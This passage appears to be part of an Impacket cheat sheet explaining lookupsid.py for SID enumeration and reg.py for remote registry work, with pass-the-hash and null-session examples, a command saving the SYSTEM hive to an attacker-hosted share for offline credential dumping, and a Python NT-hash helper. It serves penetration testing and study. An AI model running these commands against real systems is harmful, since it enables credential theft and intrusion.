Enumerates users and groups by brute-forcing SIDs over LSARPC (`LsarLookupSids`): it resolves the target's domain SID and then asks the target to translate `<domain SID>-<RID>` for every RID up to `maxRid`. It needs no special privileges and also reveals the domain SID needed for `ticketer.py -domain-sid`.

#### Basic usage

```bash
lookupsid.py [domain/]username[:password]@target [options] [maxRid]
```

#### Common options

| Option | Description |
| --- | --- |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-domain-sids` | Enumerate domain SIDs (requests are forwarded to the DC) instead of the target's local SIDs |
| `-no-pass` | Don't ask for a password (null session attempt) |
| `-debug` | Turn DEBUG output on |
| `maxRid` | Highest RID to try (positional, default: 4000) |

#### Examples

```bash
# Enumerate SIDs with local credentials
lookupsid.py administrator:Password123@192.168.1.100

# Enumerate domain SIDs up to RID 10000 with domain credentials
lookupsid.py -domain-sids domain/administrator:Password123@192.168.1.100 10000

# Pass-the-Hash (placeholder hashes, see psexec.py above)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Null session; only works where anonymous LSARPC access is still allowed
lookupsid.py anonymous@192.168.1.100 -no-pass
```
### reg.py

A remote registry tool (Remote Registry service over the `winreg` named pipe): query, add and delete keys and values, and save complete hives. Saving `HKLM\SAM`, `HKLM\SECURITY` and `HKLM\SYSTEM` to a share you control is the standard way to collect the files that `secretsdump.py ... LOCAL` parses offline.

#### Basic usage

```bash
reg.py [domain/]username[:password]@target [options] action [params]
```

#### Common options

| Option | Description |
| --- | --- |
| `-hashes LMHASH:NTHASH` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-debug` | Turn DEBUG output on |

#### Actions

| Action | Description |
| --- | --- |
| `query -keyName KEY [-v VALUE] [-s]` | Query a key (`-v` a single value, `-s` recursively) |
| `add -keyName KEY -v NAME -vt TYPE -vd DATA` | Add a key or value |
| `delete -keyName KEY [-v NAME]` | Delete a key or value |
| `save -keyName KEY -o UNCPATH` | Save a hive; the target writes it to the UNC path given with `-o` |

#### Examples

```bash
# Query a key with local credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion

# Add a value with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\SOFTWARE\Test -v TestValue -vt REG_SZ -vd "Test Data"

# Delete a key with Pass-the-Hash (placeholder hashes, see psexec.py above)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\SOFTWARE\Test

# Save the SYSTEM hive to a share hosted on the attacking machine (e.g. smbserver.py)
reg.py administrator:Password123@192.168.1.100 save -keyName HKLM\SYSTEM -o '\\192.168.1.50\share'
```
## Common Parameters Across Tools

| Parameter | Description |
| --- | --- |
| `-h`, `--help` | Show the help message and exit |
| `-debug` | Turn DEBUG output on |
| `-hashes LMHASH:NTHASH` | NTLM hashes in `LMHASH:NTHASH` form; the LM part may be left empty (`-hashes :NTHASH`) |
| `-no-pass` | Don't ask for a password (use with `-k` or for null sessions) |
| `-k` | Use Kerberos authentication; the ticket is read from the ccache named by the `KRB5CCNAME` environment variable, and the target must then be addressed by host name, not IP |
| `-aesKey KEY` | AES key (128 or 256 bit, hex) for Kerberos authentication instead of a password |
| `-dc-ip IP` | IP address of the domain controller (for Kerberos / LDAP lookups) |
| `-target-ip IP` | IP address of the target, when the target name cannot be resolved |
| `-port PORT` | Destination port to connect to |
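The `-hashes` value is the pair of hashes Windows stores for an account: the LM hash, which modern systems no longer store (hence the constant `aad3b435b51404eeaad3b435b51404ee`, the LM hash of an empty password), and the NT hash, which is MD4 over the UTF-16LE encoding of the password. The following is an added example, not Impacket code: it computes NT hashes, builds and validates a `-hashes` argument, and uses a pure-Python MD4 because `hashlib.md4` is missing from many OpenSSL 3 builds. Its correctness can be checked against the RFC 1320 test vectors and the fact that an empty password hashes to `31d6cfe0d16ae931b73c59d7e0c089c0`, the value the cheat sheet uses as a placeholder throughout.

```python
import re
import struct
from typing import Optional, Tuple

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty / not stored password


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, implemented here because hashlib often lacks it under OpenSSL 3."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)             # length in bits, little-endian

    # (round function, additive constant, message-word order, per-step rotations)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for f, k, order, shifts in rounds:
            for i in range(16):
                # each step updates one register, then the registers rotate (a,b,c,d) -> (d,a,b,c)
                a = _rotl((a + f(b, c, d) + x[order[i]] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as stored in SAM / NTDS.dit."""
    return md4(password.encode("utf-16-le")).hex()


def hashes_arg(password: Optional[str] = None, nt: Optional[str] = None) -> str:
    """Build the LMHASH:NTHASH string for -hashes from a password or a known NT hash."""
    if nt is None:
        if password is None:
            raise ValueError("need a password or an NT hash")
        nt = nt_hash(password)
    return f"{EMPTY_LM}:{nt.lower()}"


_HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_hashes_arg(value: str) -> Tuple[str, str]:
    """Validate a -hashes value the way a tool would split it: LM may be empty, NT is mandatory."""
    if value.count(":") != 1:
        raise ValueError("expected LMHASH:NTHASH")
    lm, nt = value.split(":")
    if lm and not _HEX32.match(lm):
        raise ValueError("LM hash must be 32 hex characters or empty")
    if not _HEX32.match(nt):
        raise ValueError("NT hash must be 32 hex characters")
    return lm.lower(), nt.lower()


if __name__ == "__main__":
    print(hashes_arg("Password123"))
```

`hashes_arg("")` returns exactly the placeholder pair used in the examples above, which is a quick way to confirm the implementation before trusting it with real material.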
## Resources

- Official GitHub repository: https://github.com/fortra/impacket
- Impacket example scripts: https://github.com/fortra/impacket/tree/master/examples
- Impacket wiki
- Impacket API documentation